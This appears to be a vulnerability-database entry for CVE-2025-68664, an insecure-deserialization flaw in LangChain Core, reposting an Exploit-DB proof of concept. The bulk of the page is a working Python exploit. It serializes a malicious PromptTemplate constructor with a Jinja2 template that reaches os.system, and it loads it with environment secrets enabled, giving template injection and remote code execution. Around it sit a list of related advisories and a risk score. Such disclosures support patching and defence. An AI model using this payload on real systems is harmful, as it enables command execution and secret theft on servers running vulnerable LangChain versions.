📄 LangChain Core Insecure Deserialization

🗓️ 05 May 2026 00:00:00Reported by Mohammed Idrees BanyamerType

LangChain Core insecure deserialization allows SSTI and remote code execution via a malicious PromptTemplate.

Reporter	Title	Published	Views	Family All 36
IBM Security Bulletins	Security Bulletin: LangChain Serialization Injection Vulnerability in dumps()/dumpd() (Fixed in 0.3.81 / 1.2.5) affects watsonx.data	8 Apr 202610:44	–	ibm
IBM Security Bulletins	Security Bulletin: The IBM Maximo Application Suite AI-Service component uses multiple third-party dependencies that contain vulnerabilities associated with multiple CVEs.	2 Feb 202604:24	–	ibm
IBM Security Bulletins	Security Bulletin: Platform Navigator and Automation Assets in IBM Cloud Pak for Integration are vulnerable to multiple vulnerabilities in Node.js and LangChain	25 Feb 202616:32	–	ibm
Chainguard	CVE-2025-68664 vulnerabilities	17 Jan 202601:17	–	cgr
Circl	CVE-2025-68664	23 Dec 202523:44	–	circl
CNNVD	LangChain 代码问题漏洞	23 Dec 202500:00	–	cnnvd
CVE	CVE-2025-68664	23 Dec 202522:47	–	cve
Cvelist	CVE-2025-68664 LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs	23 Dec 202522:47	–	cvelist
Exploit DB	LangChain Core 1.2.4 - SSTI/RCE	29 Apr 202600:00	–	exploitdb
GithubExploit	Exploit for CVE-2025-68664	27 Dec 202506:49	–	githubexploit

# Exploit Title: LangChain Core - SSTI/RCE 
    # Date: 2025-12-29
    # Exploit Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # Contact: @banyamer_security (Instagram)
    # GitHub: https://github.com/mbanyamer
    # Vendor Homepage: https://www.langchain.com/
    # Software Link: https://pypi.org/project/langchain-core/
    # Version: < 0.3.81 and < 1.2.5
    # Tested on: Python 3.10 - 3.12
    # CVE : CVE-2025-68664
    # Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate
    #              with Jinja2 format, leading to Server-Side Template Injection and arbitrary command execution.
    
    import os
    from langchain_core.load import dumps, load
    from langchain_core.prompts import PromptTemplate
    
    # Set a dummy env var (demonstrates potential secret access if needed)
    os.environ["TEST_SECRET"] = "secret_value_123"
    
    # Malicious constructor payload targeting PromptTemplate with SSTI
    payload = {
        "exploit": {
            "lc": 1,
            "type": "constructor",
            "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
            "kwargs": {
                "input_variables": [],
                "template": "{{ config.get('callbacks', {}).get('__builtins__', {}).get('__import__', lambda x: __import__(x))('os').system('id') }}",
                "template_format": "jinja2"
            }
        }
    }
    
    # Serialize (dumps does not escape 'lc' key)
    serialized = dumps(payload)
    
    # Deserialize - instantiates the malicious PromptTemplate
    deserialized = load(serialized, secrets_from_env=True)
    
    # Extract and invoke the malicious prompt → triggers SSTI → RCE
    malicious = deserialized["exploit"]
    output = malicious.format()
    
    print("[*] Command execution output:")
    print(output)

05 May 2026 00:00Current

7.6High risk

Vulners AI Score7.6

CVSS 3.18.2 - 9.3

EPSS0.02624

SSVC